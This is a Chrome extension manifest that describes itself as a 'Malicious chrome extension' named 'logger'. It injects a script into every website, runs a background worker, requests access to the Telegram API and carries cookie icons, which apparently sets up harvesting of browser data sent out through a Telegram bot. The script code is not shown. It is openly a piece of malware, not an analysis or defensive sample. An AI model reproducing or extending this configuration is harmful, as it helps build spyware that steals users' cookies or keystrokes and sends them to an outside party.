{
  "name": "logger",
  "description": "Malicious chrome extension",
  "version": "1.0",
  "manifest_version": 3,
  "background": {
    "service_worker": "background.js"
  },
  "host_permissions": [
    "https://api.telegram.org/*"
  ],
  "content_scripts": [
    {
      "matches": [
        "*://*/*"
      ],
      "js": [
        "temis.js"
      ]
    }
  ],
  "icons": {
    "16": "icons/cookie-16-filled.png",
    "19": "icons/cookie-19-filled.png",
    "32": "icons/cookie-32-filled.png",
    "48": "icons/cookie-48-filled.png",
    "128": "icons/cookie-128-filled.png"
  }
}
